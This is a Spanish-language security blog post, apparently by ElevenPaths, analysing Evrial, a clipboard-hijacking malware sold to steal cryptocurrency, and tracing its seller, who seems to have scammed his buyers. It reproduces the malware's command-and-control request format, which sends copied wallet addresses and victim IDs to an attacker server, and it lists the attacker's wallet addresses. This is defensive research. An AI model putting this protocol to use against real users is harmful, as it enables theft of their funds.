Evrial, el malware que roba Bitcoins a través del portapapeles, y el estafador estafadoElevenPaths 26 febrero, 2018 Evrial es el último malware que se vende en el mercado negro, diseñado para robar criptomonedas, y que se apodera del control del portapapeles para obtener «dinero fácil». ElevenPaths ha realizado un profundo estudio técnico sobre este malware, para mostrar su funcionamiento y detalles técnicos, con un vídeo auto-explicativo. Además, hemos seguido los pasos de su creador y algunos de sus compradores. Concluimos que además de crear el malware, se ha dedicado a estafar a los estafadores. Qutra, el creador, vendiendo su malware Desde finales de 2017, teníamos Cryptoshuffle, un tipo de malware capaz de robar el portapapeles y modificar la dirección de ciertas criptomonedas en él. Pero, algo más tarde, alguien percibió el negocio en esto y comenzó a vender una plataforma a la que llamó «Evrial». A principios de 2018, Cryptoshuffle empezó a «desaparecer» y, Evrial, vio la luz (primera muestra encontrada) a mediados de enero. Se trata de un malware .NET capaz de robar contraseñas de los navegadores, clientes FTP, Pidgin y lo mejor de todo, capaz de modificar el portapapeles sobre la marcha y cambiar la dirección de una cartera de criptodivisas a otra a elección del atacante (comprador y usuario del malware). Por tanto, la característica más interesante es que el malware verifica el formato de aquello que esté en el portapapeles. Si la víctima copia, por ejemplo, la dirección de una cartera Bitcoin o Litecoin, ésta es rápidamente reemplazada por otra, sobre la marcha y dinámicamente (obteniendo la dirección destino de un servidor de control). Tomando la dirección de un servidor y estableciéndola en el portapapeles. Evrial permite al atacante controlar el portapapeles desde un cómodo panel de control donde toda la información robada está disponible. Cuando el criminal interesado en Evrial compra la aplicación, puede establecer su «nombre» para identificarse en el panel (que estará incrustado en el código y, por tanto, la versión de Evrial será única y personalizada para el comprador). Panel con el que el creador anunciaba su obra y con el que los compradores gestionan sus botines Por ejemplo, en un ordenador infectado, cada vez que una dirección de una cartera sea copiada al portapapeles, se realiza una petición a algún servidor remoto propiedad del atacante. Este es el formato: [C2domian.com]/shuffler.php?type=BTC&user=ATACANTE©=[CualquierDirecciónDeCarteraCopiadaAlPortapapeles]&hwid=[IdentificadorÚnicoDeLaVictima] Donde type puede ser BTC, LTC, ETH, XMR, WMR, WMZ o Steam. El servidor responderá con una dirección a elección del atacante. ¿Y esto para qué sirve? Cuando se quiere realizar, por ejemplo, una transferencia en Bitcoins, normalmente el usuario copia y pega la dirección destino… si ésta se cambia «sobre la marcha» el atacante espera que, de forma inconsciente y fruto de la confianza ciega en el contenido del portapapeles, el usuario confirme la transacción. Pero en este caso irá a la dirección del atacante. Ahí radica el truco. En este vídeo se muestra el funcionamiento de Evrial: Y en este lo vemos de nuevo con más detalles técnicos: Algunos datos curiosos Hemos encontrado varias versiones del malware. Todas ellas están enmascaradas en un proceso que simula ser otro diferente en la descripción. 567.exe es el proceso monitorizando el portapapeles Se ejecuta cada vez que el ordenador arranca (escondido en una llamada al registro a %appdata%). Está escrito en .NET donde algunas versiones incorporan un blindaje, que dificulta su análisis, aunque otras carecen de esta protección. El dominio C&C se obtiene de algún lugar de github cada vez que se ejecuta. De momento, este es el dominio principal para el malware Cualquier intento de copiar al portapapeles la misma dirección que devuelve el servidor (es decir, la que pertenece al atacante) hace que Evrial simplemente borre el contenido del portapapeles. ¿Quien está detras de Evrial? El propio autor muestra su nombre de usuario de Telegram: @Qutrachka. Esta cuenta aparece en el propio código fuente para contactar con él. Usando esta información y algunas muestras analizadas, ha sido posible identificar varios usuarios que utilizando el nombre Qutra y cuyo objetivo es vender este software malicioso. Hemos encontrado, además, evidencias de que el malware Cryptoshuffle está conectado con el mismo autor. Por ejemplo, en una una publicación en pastebin donde se ofrece una explicación sobre las funcionalidades de esta familia publicada bajo el mismo nombre de usuario. Días después de ponerlo a la venta, en nuestro seguimiento, hemos encontrado que algunos de los foros donde vendía su programa, el usuario Qutrachka ha sido «baneado». ¿Por qué? El usuario Qutra baneado del foro donde solía intentar vender el malware ¿Los estafadores estafados? Volviendo al malware, el campo «user» en las respuestas es bastante interesante. Hemos encontrado diferentes nombres en varias muestras que hemos analizado: Itakeda, Plaka, depr103, onfrich, fr3d, ogus, xandrum, danildh, crypto368, knoxvile, hyipblock, fast63, spysdar, zheska, medols1, raff, desusenpai… Esos corresponden también a usuarios en páginas relacionadas con Bitcoins o en foros de Steam (recordemos que el malware también roba las fórmulas de pago de esta plataforma). Nicknames encontrados en el campo «user» del malware (por tanto, compradores potenciales) encontrados a su vez en foros relacionados con Bitcoins y Steam Supuestamente, los atacantes que compraron el malware a Qutrachka, recibieron una compilación exclusiva de versión para ellos, donde el creador incrustó sus nombres. Da a entender que los «estafadores» debieron ajustar la dirección de la cartera que debía devolver el servidor a la suya, y comenzar a recoger beneficios por comprar el malware. Así es como se supone que debería ser, ¿no? Pero no es el caso, ¿recordáis esta URL? [C2domian.com]/shuffler.php?type=BTC&user=ATACANTECOMPRADOR©=[CualquierDirecciónDeCarteraCopiadaAlPortapapeles]&hwid=[IdentificadorÚnicoDeLaVictima] < El problema está en que, ahora mismo, da igual lo que insertes en el campo «user», siempre devuelve la misma dirección de criptodivisa, la que pertenece a Qutrachka y la original que aparece en las versiones más tempranas de este malware. Por tanto, nuestra teoría es: Qutrachka ha cambiado el servidor para que, ante cualquier petición realizada, devuelva la dirección de la cartera que él posee. Así que, posiblemente, haya estafado a los estafadores. ¿Cuanto ha ganado hasta ahora? Lo que hemos hecho ha sido modificar la cabecera con todos los códigos de criptodivisas posibles para, de esta forma, obtener todas las cuentas que pertenecen a los distintos tipos de dirección atacados. [C2domian.com]/shuffler.php?type=BTC&user=ATACANTE©=[CualquierDirecciónDeCarteraCopiadaAlPortapapeles]&hwid=[IdentificadorÚnicoDeLaVictima] Hemos solicitado los diferentes tipos cambiando a BTC, LTC, ETH, XMR, WMR, WMZ o Steam. Y los resultados han sido estos: LTC: LiHcBT4ag4wGi4fDt5ScXuxvjKTcp9TeG2 BTC: 12MEp1W6EBdUEcmbhg4qJfaTB5bCNPtLHh ETH: EO0x79ee1da747057c221680f94b7982ba4f3f05b822 XMR:4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nU MXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQp4nTDUPjYLQJVQKcA WMR: R262605493266 WMZ: Z924876540636 Y ahora, vamos a analizar cuánto hay en cada cartera. Tras comprobar los sistemas de pago escogidos por el atacante, ha sido posible saber que ha recibido un total de 21 transacciones en su cartera de Bitcoin, supuestamente de sus victimas, obteniendo aproximadamente 0.122 BTC. Observamos que si bien las carteras de los ataques ransomware normalmente reciben la misma cantidad de sus víctimas, en este caso, el rango es más amplio y los pagos son todos diferentes. Bitcoins obtenidos hasta finales de febrero El atacante ha movido todo el dinero a otras direcciones para intentar confundir el rastro de sus pagos. A esto hay que sumar también que el atacante ha recibido 0.0131 LTC en su cuenta de Litecoins, y que esa cantidad sigue aún disponible. Por otro lado, no ha sido posible trastear pagos relacionados con su cuenta en Monero, ni tampoco los posibles pagos recibidos en sus carteras Webmoney (WMR y WMZ). Tampoco tenemos datos sobre su cuenta de Ethereum. Innovation and laboratory innovationlab@11paths.com Miguel Ángel de Castro Simón Senior Cybersecurity Analyst at ElevenPaths miguelangel.decastro@telefonica.com » Te interesa: CriptoClipWatcher: Nuestra nueva herramienta contra las técnicas de «crypto clipboard hijacking» ElevenPaths en el MWC’18Innovación y Laboratorio de ElevenPaths, en el foro Transfiere junto con Andalucía Open Future
Telefónica Tech Boletín semanal de Ciberseguridad, 18 – 24 de marzo HinataBot: nueva botnet dedicada a ataques de DDoS El equipo de investigadores de Akamai ha publicado un informe en el que señala que han identificado una nueva botnet denominada HinataBot que dispondría...
Telefónica Tech Qué es el Esquema Nacional de Seguridad (ENS 2.0) La Ciberseguridad, la privacidad y la protección de los datos y de la información sensible son aspectos cada vez más importantes en la sociedad actual. Tanto para empresas y...
Nacho Palou 5G: cuatro casos de uso reales y prácticos El último informe “La Sociedad Digital en España 2022” [1] de Fundación Telefónica confirma la consolidación de los procesos de digitalización en la sociedad española. En este sentido, cabe...
Susana Alwasity Ciberseguridad: eventos “cisne negro” en un mundo conectado En la sociedad actual, la tecnología ha transformado la forma en que vivimos, trabajamos y nos relacionamos. Con el aumento del uso de dispositivos y redes conectados a internet,...
Telefónica Tech Boletín semanal de Ciberseguridad, 11 – 17 de marzo Nueva versión del troyano bancario Xenomorph Investigadores de ThreatFabric han detectado una nueva variante del troyano bancario para Android Xenomorph. Esta familia de malware fue detectada por primera vez en febrero...
Gonzalo Álvarez Marañón Matemáticas contra el cibercrimen: cómo detectar fraude, manipulaciones y ataques aplicando la Ley de Benford Cómo aplicar la ley de Benford para luchar contra el cibercrimen. La respuesta, en este post que utiliza las matemáticas para ayudar a la ciberseguridad.
